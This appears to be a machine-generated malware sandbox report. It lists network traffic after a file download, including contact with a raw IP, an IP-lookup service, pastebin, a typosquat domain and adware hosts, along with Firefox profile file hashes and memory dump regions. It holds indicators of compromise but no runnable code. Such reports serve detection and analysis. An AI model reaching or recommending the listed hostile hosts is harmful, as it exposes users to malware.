NL 142.250.179.206:443 www3.l.google.com tcp
US 8.8.8.8:53 otnolatrnup.com udp
US 8.8.8.8:53 200.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 48.53.16.104.in-addr.arpa udp
US 8.8.8.8:53 139.7.26.104.in-addr.arpa udp
US 8.8.8.8:53 37.214.19.104.in-addr.arpa udp
US 8.8.8.8:53 101.57.16.104.in-addr.arpa udp
US 8.8.8.8:53 112.189.64.185.in-addr.arpa udp
US 8.8.8.8:53 139.148.107.34.in-addr.arpa udp
US 8.8.8.8:53 237.214.235.34.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 130.211.23.194:443 api.btloader.com tcp
US 104.26.2.70:443 ad-delivery.net tcp
US 104.26.2.70:443 ad-delivery.net tcp
NL 142.250.179.206:443 www3.l.google.com udp
US 104.19.215.37:443 otnolatrnup.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
NL 142.251.36.1:443 lh3.googleusercontent.com tcp
US 130.211.23.194:443 api.btloader.com udp
NL 142.251.36.1:443 lh3.googleusercontent.com udp
US 8.8.8.8:53 googlehosted.l.googleusercontent.com udp
NL 108.156.61.65:443 cdn.amplitude.com tcp
DE 172.217.23.194:443 securepubads46.g.doubleclick.net tcp
US 8.8.8.8:53 googlehosted.l.googleusercontent.com udp
US 8.8.8.8:53 analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 analytics-alv.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 analytics-alv.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 translate-pa.googleapis.com udp
US 8.8.8.8:53 translate-pa.googleapis.com udp
US 216.239.36.181:443 analytics-alv.google.com tcp
NL 142.250.179.202:443 translate-pa.googleapis.com tcp
US 8.8.8.8:53 translate-pa.googleapis.com udp
US 8.8.8.8:53 37.215.19.104.in-addr.arpa udp
US 8.8.8.8:53 194.23.211.130.in-addr.arpa udp
US 8.8.8.8:53 70.2.26.104.in-addr.arpa udp
US 216.239.36.181:443 analytics-alv.google.com udp
NL 142.250.179.202:443 translate-pa.googleapis.com udp
DE 172.217.23.194:443 securepubads46.g.doubleclick.net udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 65.61.156.108.in-addr.arpa udp
US 8.8.8.8:53 194.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 198.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 api.amplitude.com udp
US 52.40.67.88:443 api.amplitude.com tcp
US 8.8.8.8:53 api.amplitude.com udp
US 8.8.8.8:53 api.amplitude.com udp
NL 142.250.102.156:443 stats.g.doubleclick.net tcp
US 130.211.23.194:443 api.btloader.com udp
US 8.8.8.8:53 181.36.239.216.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 202.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 156.102.250.142.in-addr.arpa udp
NL 142.250.102.156:443 stats.g.doubleclick.net udp
US 104.19.215.37:443 otnolatrnup.com tcp
US 8.8.8.8:53 download2287.mediafire.com udp
US 199.91.155.28:443 download2287.mediafire.com tcp
US 8.8.8.8:53 download2287.mediafire.com udp
US 8.8.8.8:53 download2287.mediafire.com udp
US 8.8.8.8:53 88.67.40.52.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 28.155.91.199.in-addr.arpa udp
US 104.19.215.37:443 otnolatrnup.com udp
US 104.19.215.37:80 otnolatrnup.com tcp
US 8.8.8.8:53 woreppercomming.com udp
US 34.199.180.187:443 woreppercomming.com tcp
US 8.8.8.8:53 woreppercomming.com udp
US 8.8.8.8:53 woreppercomming.com udp
US 8.8.8.8:53 www.biphic.com udp
US 172.67.152.108:443 www.biphic.com tcp
US 8.8.8.8:53 www.biphic.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 www.biphic.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
US 172.67.152.108:443 www.biphic.com udp
US 8.8.8.8:53 www.opera.com udp
US 3.21.48.32:443 www.opera.com tcp
US 8.8.8.8:53 front-geo.production.opera-website.route53.opera.com udp
US 8.8.8.8:53 front-geo.production.opera-website.route53.opera.com udp
US 8.8.8.8:53 187.180.199.34.in-addr.arpa udp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 108.152.67.172.in-addr.arpa udp
US 8.8.8.8:53 130.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 ads.pubmatic.com udp
NL 2.17.212.251:443 ads.pubmatic.com tcp
US 8.8.8.8:53 e6603.g.akamaiedge.net udp
US 8.8.8.8:53 e6603.g.akamaiedge.net udp
US 8.8.8.8:53 www.googleoptimize.com udp
US 8.8.8.8:53 cdn-production-opera-website.operacdn.com udp
US 8.8.8.8:53 www.googleoptimize.com udp
NL 23.66.22.160:443 cdn-production-opera-website.operacdn.com tcp
NL 23.66.22.160:443 cdn-production-opera-website.operacdn.com tcp
NL 23.66.22.160:443 cdn-production-opera-website.operacdn.com tcp
NL 23.66.22.160:443 cdn-production-opera-website.operacdn.com tcp
NL 23.66.22.160:443 cdn-production-opera-website.operacdn.com tcp
US 8.8.8.8:53 www.googleoptimize.com udp
NL 23.66.22.160:443 cdn-production-opera-website.operacdn.com tcp
US 8.8.8.8:53 e11604.dscf.akamaiedge.net udp
US 8.8.8.8:53 e11604.dscf.akamaiedge.net udp
US 8.8.8.8:53 32.48.21.3.in-addr.arpa udp
US 8.8.8.8:53 251.212.17.2.in-addr.arpa udp
US 8.8.8.8:53 160.22.66.23.in-addr.arpa udp
US 8.8.8.8:53 image6.pubmatic.com udp
NL 198.47.127.19:443 image6.pubmatic.com tcp
NL 198.47.127.19:443 image6.pubmatic.com tcp
US 8.8.8.8:53 pugm-amsfpairbc.pubmnet.com udp
US 8.8.8.8:53 pugm-amsfpairbc.pubmnet.com udp
US 8.8.8.8:53 simage4.pubmatic.com udp
GB 185.64.190.81:443 simage4.pubmatic.com tcp
US 8.8.8.8:53 spug-lhrc.pubmnet.com udp
GB 185.64.190.81:443 spug-lhrc.pubmnet.com tcp
US 8.8.8.8:53 www.redditstatic.com udp
US 8.8.8.8:53 static.hotjar.com udp
US 8.8.8.8:53 cdn.taboola.com udp
US 8.8.8.8:53 connect.facebook.net udp
US 8.8.8.8:53 s.yimg.com udp
US 8.8.8.8:53 spug-lhrc.pubmnet.com udp
US 8.8.8.8:53 tags.creativecdn.com udp
US 151.101.1.140:443 www.redditstatic.com tcp
US 8.8.8.8:53 global.easysecurecdn.com udp
US 8.8.8.8:53 bat.bing.com udp
US 8.8.8.8:53 tags.creativecdn.com udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
NL 87.248.116.12:443 s.yimg.com tcp
US 8.8.8.8:53 tags.creativecdn.com udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 alb.reddit.com udp
US 8.8.8.8:53 dualstack.reddit.map.fastly.net udp
US 8.8.8.8:53 dualstack.reddit.map.fastly.net udp
US 8.8.8.8:53 tls13.taboola.map.fastly.net udp
US 8.8.8.8:53 static-cdn.hotjar.com udp
NL 13.227.219.21:443 global.easysecurecdn.com tcp
US 204.79.197.200:443 bat.bing.com tcp
US 216.239.36.181:443 analytics-alv.google.com tcp
US 8.8.8.8:53 tls13.taboola.map.fastly.net udp
US 8.8.8.8:53 edge.gycpi.b.yahoodns.net udp
US 8.8.8.8:53 edge.gycpi.b.yahoodns.net udp
NL 87.248.116.12:443 edge.gycpi.b.yahoodns.net tcp
US 8.8.8.8:53 d2zcjgsjw9h04r.cloudfront.net udp
US 8.8.8.8:53 d2zcjgsjw9h04r.cloudfront.net udp
US 8.8.8.8:53 dual-a-0001.a-msedge.net udp
US 216.239.36.181:443 analytics-alv.google.com udp
US 8.8.8.8:53 dual-a-0001.a-msedge.net udp
US 8.8.8.8:53 sp.analytics.yahoo.com udp
US 8.8.8.8:53 reddit.map.fastly.net udp
NL 52.222.139.19:443 static.hotjar.com tcp
US 151.101.1.44:443 tls13.taboola.map.fastly.net tcp
NL 157.240.247.8:443 connect.facebook.net tcp
US 34.117.98.198:443 tags.creativecdn.com tcp
US 151.101.1.140:443 reddit.map.fastly.net tcp
IE 212.82.100.181:443 sp.analytics.yahoo.com tcp
US 8.8.8.8:53 reddit.map.fastly.net udp
US 34.117.98.198:443 tags.creativecdn.com udp
US 8.8.8.8:53 spdc-global.pbp.gysm.yahoodns.net udp
US 8.8.8.8:53 spdc-global.pbp.gysm.yahoodns.net udp
US 8.8.8.8:53 19.127.47.198.in-addr.arpa udp
US 8.8.8.8:53 81.190.64.185.in-addr.arpa udp
US 8.8.8.8:53 140.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 12.116.248.87.in-addr.arpa udp
US 8.8.8.8:53 21.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 198.98.117.34.in-addr.arpa udp
US 8.8.8.8:53 44.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 8.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 19.139.222.52.in-addr.arpa udp
US 8.8.8.8:53 181.100.82.212.in-addr.arpa udp
NL 142.250.102.156:443 stats.g.doubleclick.net tcp
NL 157.240.247.8:443 connect.facebook.net udp
US 8.8.8.8:53 trc.taboola.com udp
US 8.8.8.8:53 script.hotjar.com udp
US 8.8.8.8:53 dualstack.tls13.taboola.map.fastly.net udp
US 8.8.8.8:53 dualstack.tls13.taboola.map.fastly.net udp
NL 142.250.102.156:443 stats.g.doubleclick.net udp
US 151.101.1.44:443 dualstack.tls13.taboola.map.fastly.net tcp
NL 13.227.219.28:443 script.hotjar.com tcp
US 8.8.8.8:53 ams.creativecdn.com udp
US 8.8.8.8:53 script.hotjar.com udp
NL 185.184.8.90:443 ams.creativecdn.com tcp
NL 185.184.8.90:443 ams.creativecdn.com tcp
US 8.8.8.8:53 script.hotjar.com udp
US 8.8.8.8:53 ams.creativecdn.com udp
US 8.8.8.8:53 ams.creativecdn.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 star-mini.c10r.facebook.com udp
US 8.8.8.8:53 star-mini.c10r.facebook.com udp
US 8.8.8.8:53 28.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 90.8.184.185.in-addr.arpa udp
US 8.8.8.8:53 www.mediafire.com udp
US 8.8.8.8:53 i.ytimg.com udp
NL 172.217.168.214:443 i.ytimg.com tcp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 i.ytimg.com udp
NL 172.217.168.214:443 i.ytimg.com udp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 plus.l.google.com udp
US 8.8.8.8:53 plus.l.google.com udp
US 8.8.8.8:53 214.168.217.172.in-addr.arpa udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 2.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
NL 142.251.36.6:443 static.doubleclick.net tcp
US 8.8.8.8:53 static.doubleclick.net udp
NL 142.251.39.106:443 jnn-pa.googleapis.com tcp
NL 142.251.39.106:443 jnn-pa.googleapis.com tcp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
NL 142.251.36.6:443 static.doubleclick.net udp
NL 142.251.39.106:443 jnn-pa.googleapis.com udp
NL 142.251.39.106:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 106.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 www.7-zip.org udp
DE 49.12.202.237:443 www.7-zip.org tcp
US 8.8.8.8:53 www.7-zip.org udp
US 8.8.8.8:53 www.7-zip.org udp
DE 49.12.202.237:443 www.7-zip.org tcp
US 8.8.8.8:53 237.202.12.49.in-addr.arpa udp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
US 8.8.8.8:53 38.148.119.40.in-addr.arpa udp
US 8.8.8.8:53 253.15.104.51.in-addr.arpa udp
NL 94.142.138.4:80 tcp
NL 94.142.138.4:80 tcp
US 8.8.8.8:53 4.138.142.94.in-addr.arpa udp
NL 94.142.138.4:80 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 104.26.13.31:443 api.ip.sb tcp
NL 94.142.138.4:80 tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
NL 94.142.138.4:80 tcp
US 104.26.13.31:443 api.ip.sb tcp
N/A 194.50.153.183:80 194.50.153.183 tcp
N/A 194.50.153.183:80 194.50.153.183 tcp
US 8.8.8.8:53 183.153.50.194.in-addr.arpa udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 github.com udp
US 140.82.113.4:443 github.com tcp
US 140.82.113.4:443 github.com tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 4.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
NL 185.209.161.189:80 185.209.161.189 tcp
US 8.8.8.8:53 189.161.209.185.in-addr.arpa udp
NL 94.142.138.4:80 tcp
NL 94.142.138.4:80 tcp
NL 94.142.138.4:80 tcp
US 104.26.13.31:443 api.ip.sb tcp
US 104.26.13.31:443 api.ip.sb tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 yotube.com udp
LT 93.115.28.104:80 yotube.com tcp
LT 93.115.28.104:80 yotube.com tcp
US 8.8.8.8:53 yotube.com udp
US 8.8.8.8:53 yotube.com udp
US 8.8.8.8:53 104.28.115.93.in-addr.arpa udp
US 8.8.8.8:53 phanu-swc.com udp
US 52.0.238.176:80 phanu-swc.com tcp
US 8.8.8.8:53 phanu-swc.com udp
US 8.8.8.8:53 phanu-swc.com udp
US 52.0.238.176:80 phanu-swc.com tcp
US 8.8.8.8:53 176.238.0.52.in-addr.arpa udp
US 8.8.8.8:53 xml-v4.explorefast-2.com udp
US 173.239.53.32:80 xml-v4.explorefast-2.com tcp
US 8.8.8.8:53 adventurefeeds.xml-v4.ak-is2.net udp
US 8.8.8.8:53 adventurefeeds.xml-v4.ak-is2.net udp
US 8.8.8.8:53 epo.wpori.com udp
US 52.204.19.219:443 epo.wpori.com tcp
US 8.8.8.8:53 ph2n7.bmtrck.com udp
US 8.8.8.8:53 ph2n7.bmtrck.com udp
US 8.8.8.8:53 sessydates.com udp
US 8.8.8.8:53 32.53.239.173.in-addr.arpa udp
US 8.8.8.8:53 219.19.204.52.in-addr.arpa udp
US 104.21.2.195:443 sessydates.com tcp
US 8.8.8.8:53 sessydates.com udp
US 8.8.8.8:53 sessydates.com udp
US 8.8.8.8:53 195.2.21.104.in-addr.arpa udp
US 8.8.8.8:53 support.mozilla.org udp
US 8.8.8.8:53 prod.sumo.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.sumo.prod.webservices.mozgcp.net udp
LT 93.115.28.104:80 yotube.com tcp
LT 93.115.28.104:80 yotube.com tcp
NL 216.58.214.14:80 youtube.com tcp
NL 216.58.214.14:80 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
NL 216.58.214.14:443 youtube.com udp
NL 172.217.168.214:443 i.ytimg.com tcp
NL 172.217.168.214:443 i.ytimg.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 suggestqueries-clients6.youtube.com udp
NL 172.217.168.206:443 suggestqueries-clients6.youtube.com tcp
NL 172.217.168.206:443 suggestqueries-clients6.youtube.com tcp
US 8.8.8.8:53 suggestqueries-clients6.youtube.com udp
US 8.8.8.8:53 suggestqueries-clients6.youtube.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 172.217.168.206:443 suggestqueries-clients6.youtube.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 photos-ugc.l.googleusercontent.com udp
US 8.8.8.8:53 photos-ugc.l.googleusercontent.com udp
NL 142.251.36.1:443 photos-ugc.l.googleusercontent.com udp
US 8.8.8.8:53 206.168.217.172.in-addr.arpa udp
NL 142.251.39.106:443 jnn-pa.googleapis.com tcp
NL 142.251.39.106:443 jnn-pa.googleapis.com tcp
NL 142.251.39.106:443 jnn-pa.googleapis.com udp
NL 142.251.39.106:443 jnn-pa.googleapis.com udp
NL 142.251.36.6:443 static.doubleclick.net tcp
NL 142.251.36.6:443 static.doubleclick.net udp
NL 216.58.214.14:443 youtube.com udp
US 8.8.8.8:53 id.google.com udp
NL 142.251.36.3:443 id.google.com tcp
US 8.8.8.8:53 id.google.com udp
US 8.8.8.8:53 id.google.com udp
NL 142.251.36.3:443 id.google.com udp
NL 172.217.168.214:443 i.ytimg.com udp
US 8.8.8.8:53 3.36.251.142.in-addr.arpa udp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 encrypted-vtbn0.gstatic.com udp
NL 142.251.36.14:443 encrypted-vtbn0.gstatic.com tcp
US 8.8.8.8:53 encrypted-vtbn0.gstatic.com udp
US 8.8.8.8:53 encrypted-vtbn0.gstatic.com udp
NL 142.251.36.14:443 encrypted-vtbn0.gstatic.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.6:443 static.doubleclick.net udp
NL 142.251.39.106:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com tcp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 e6mtnbzgyn4xobccbrhpve7gjcnd2ryn-c2r.metric.gstatic.com udp
NL 216.58.214.3:443 e6mtnbzgyn4xobccbrhpve7gjcnd2ryn-c2r.metric.gstatic.com tcp
US 8.8.8.8:53 e6mtnbzgyn4xobccbrhpve7gjcnd2ryn-c2r.metric.gstatic.com udp
US 8.8.8.8:53 e6mtnbzgyn4xobccbrhpve7gjcnd2ryn-c2r.metric.gstatic.com udp
NL 216.58.214.3:443 e6mtnbzgyn4xobccbrhpve7gjcnd2ryn-c2r.metric.gstatic.com udp
US 8.8.8.8:53 3.214.58.216.in-addr.arpa udp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 apis.google.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com tcp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com udp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 theclashify.com udp
US 188.114.97.0:443 theclashify.com tcp
US 8.8.8.8:53 theclashify.com udp
US 8.8.8.8:53 theclashify.com udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 188.114.97.0:443 theclashify.com tcp
US 188.114.97.0:443 theclashify.com tcp
NL 172.217.168.214:443 i.ytimg.com udp
NL 142.251.36.6:443 static.doubleclick.net udp
NL 142.251.36.14:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 cheatermad.com udp
US 188.114.97.0:443 cheatermad.com tcp
US 8.8.8.8:53 cheatermad.com udp
US 188.114.97.0:443 cheatermad.com tcp
US 8.8.8.8:53 aus5.mozilla.org udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
DE 2.22.61.59:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 216.58.208.110:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-5hneknee.gvt1.com udp
GB 216.58.208.110:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4.sn-5hneknee.gvt1.com udp
NL 74.125.8.73:443 r4.sn-5hneknee.gvt1.com tcp
US 8.8.8.8:53 r4.sn-5hneknee.gvt1.com udp
US 8.8.8.8:53 59.61.22.2.in-addr.arpa udp
US 8.8.8.8:53 110.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 73.8.125.74.in-addr.arpa udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 216.58.208.110:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp

Files

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\activity-stream.discovery_stream.json.tmp

MD5 96032a2db8a47d2f33a1b8e9ba4ffc1e
SHA1 c3cfe33a3874aad7ace425a4557bfcb1de57e49e
SHA256 7ab0716a05f823239141e199335ac2b76913d74c422fa82adadf8786283523f7
SHA512 fc40b6be7dfe37ee2b67bd36448459b9f4740d400827c19a0643c199e6c27a0106d8216ca2c2866942b196015cfb6092eca4560b37c5d0f636b9b35e02e1abf8

memory/724-162-0x00007FF787120000-0x00007FF787218000-memory.dmp

memory/724-163-0x00007FF923DB0000-0x00007FF923DE4000-memory.dmp

memory/724-164-0x00007FF91FD20000-0x00007FF91FFD4000-memory.dmp

memory/724-166-0x00007FF924310000-0x00007FF924327000-memory.dmp

memory/724-167-0x00007FF923BE0000-0x00007FF923BF1000-memory.dmp

memory/724-168-0x00007FF923BC0000-0x00007FF923BD7000-memory.dmp

memory/724-169-0x00007FF923BA0000-0x00007FF923BB1000-memory.dmp

memory/724-172-0x00007FF91F7B0000-0x00007FF91F9B0000-memory.dmp

memory/724-171-0x00007FF923AE0000-0x00007FF923AF1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\prefs-1.js

MD5 f3725e45308da90e594159b7d5caac3a
SHA1 ac8ce683026006936faaf132d7c05565588bd203
SHA256 c8a5f2d464032ff90ce30c472301a513a929dbcd106d9a815fa3c6506cce0a69
SHA512 262a15f62debd32d9619f6acece063d309cc9b003f694a1b14c0d35e446cd737fea2a5dbad85ed844ec579fb20b1bb8fe1d5eb6961cba0b3a1be1b456ea3932e

memory/724-170-0x00007FF923B80000-0x00007FF923B9D000-memory.dmp

memory/724-165-0x00007FF9243F0000-0x00007FF924408000-memory.dmp

memory/724-175-0x00007FF9105B0000-0x00007FF91165B000-memory.dmp

memory/724-178-0x00007FF921540000-0x00007FF92157F000-memory.dmp

memory/724-180-0x00007FF921520000-0x00007FF921538000-memory.dmp

memory/724-181-0x00007FF921500000-0x00007FF921511000-memory.dmp

memory/724-186-0x00007FF921370000-0x00007FF921388000-memory.dmp

memory/724-185-0x00007FF921390000-0x00007FF9213A1000-memory.dmp

memory/724-192-0x00007FF9212F0000-0x00007FF921318000-memory.dmp

memory/724-193-0x00007FF9200A0000-0x00007FF9200C4000-memory.dmp

memory/724-194-0x00007FF91FD00000-0x00007FF91FD17000-memory.dmp

memory/724-196-0x00007FF91FBD0000-0x00007FF91FBE1000-memory.dmp

memory/724-197-0x00007FF91FBB0000-0x00007FF91FBC2000-memory.dmp

memory/724-198-0x00007FF91FB80000-0x00007FF91FBA1000-memory.dmp

memory/724-200-0x00007FF91FB40000-0x00007FF91FB52000-memory.dmp

memory/724-199-0x00007FF91FB60000-0x00007FF91FB73000-memory.dmp

memory/724-201-0x00007FF91F670000-0x00007FF91F7AB000-memory.dmp

memory/724-202-0x00007FF91FB10000-0x00007FF91FB3C000-memory.dmp

memory/724-203-0x00007FF91F4B0000-0x00007FF91F662000-memory.dmp

memory/724-204-0x00007FF91F450000-0x00007FF91F4AC000-memory.dmp

memory/724-205-0x00007FF91FAF0000-0x00007FF91FB01000-memory.dmp

memory/724-207-0x00007FF91F9F0000-0x00007FF91FA02000-memory.dmp

memory/724-208-0x00007FF910370000-0x00007FF9105A1000-memory.dmp

memory/724-209-0x00007FF91EDC0000-0x00007FF91EED2000-memory.dmp

memory/724-206-0x00007FF91F3B0000-0x00007FF91F447000-memory.dmp

memory/724-211-0x00007FF91ED90000-0x00007FF91EDB5000-memory.dmp

memory/724-213-0x00007FF91ED00000-0x00007FF91ED61000-memory.dmp

memory/724-212-0x00007FF91ED70000-0x00007FF91ED81000-memory.dmp

memory/724-219-0x00007FF910260000-0x00007FF910362000-memory.dmp

memory/724-218-0x00007FF91DC60000-0x00007FF91DC71000-memory.dmp

memory/724-226-0x00007FF910230000-0x00007FF910259000-memory.dmp

memory/724-225-0x00007FF91A850000-0x00007FF91A866000-memory.dmp

memory/724-227-0x00007FF91A3E0000-0x00007FF91A3F2000-memory.dmp

memory/724-229-0x00007FF9101F0000-0x00007FF910201000-memory.dmp

memory/724-228-0x00007FF910210000-0x00007FF910221000-memory.dmp

memory/724-224-0x00007FF91A870000-0x00007FF91A888000-memory.dmp

memory/724-223-0x00007FF91B2E0000-0x00007FF91B2F2000-memory.dmp

memory/724-222-0x00007FF91B300000-0x00007FF91B311000-memory.dmp

memory/724-221-0x00007FF91DC20000-0x00007FF91DC31000-memory.dmp

memory/724-220-0x00007FF91DC40000-0x00007FF91DC51000-memory.dmp

memory/724-217-0x00007FF919D80000-0x00007FF919E1F000-memory.dmp

memory/724-216-0x00007FF91DC80000-0x00007FF91DC93000-memory.dmp

memory/724-215-0x00007FF91DEF0000-0x00007FF91DF02000-memory.dmp

memory/724-214-0x00007FF91ECE0000-0x00007FF91ECF1000-memory.dmp

memory/724-210-0x00007FF91F370000-0x00007FF91F3A5000-memory.dmp

memory/724-195-0x00007FF91FBF0000-0x00007FF91FC13000-memory.dmp

memory/724-191-0x00007FF920410000-0x00007FF920466000-memory.dmp

memory/724-190-0x00007FF921320000-0x00007FF921331000-memory.dmp

memory/724-189-0x00007FF91FC20000-0x00007FF91FC8F000-memory.dmp

memory/724-184-0x00007FF9214A0000-0x00007FF9214BB000-memory.dmp

memory/724-183-0x00007FF9214C0000-0x00007FF9214D1000-memory.dmp

memory/724-182-0x00007FF9214E0000-0x00007FF9214F1000-memory.dmp

memory/724-188-0x00007FF9200D0000-0x00007FF920137000-memory.dmp

memory/724-187-0x00007FF921340000-0x00007FF921370000-memory.dmp

memory/724-179-0x00007FF9215D0000-0x00007FF9215F1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xcsgzdt0.default-release\sessionstore-backups\recovery.jsonlz4

MD5 6b9dbd5b7540bd4f7a945d6e05ebd320
SHA1 b043cf93d21ef0ee7b2ce2e665b38ba1d0c6f807
SHA256 6987763b5a90b326c7763b944bfcdbdd3150f5712fa6dd8f8417647aa033149d
SHA512 37e5cefd78b70cff73e1ba4697c965ebca1057d9b335bed4f7010aec27f7b4f88612470ef356608988d425501b6232ac383289d95a587893987a0429e47a58c0

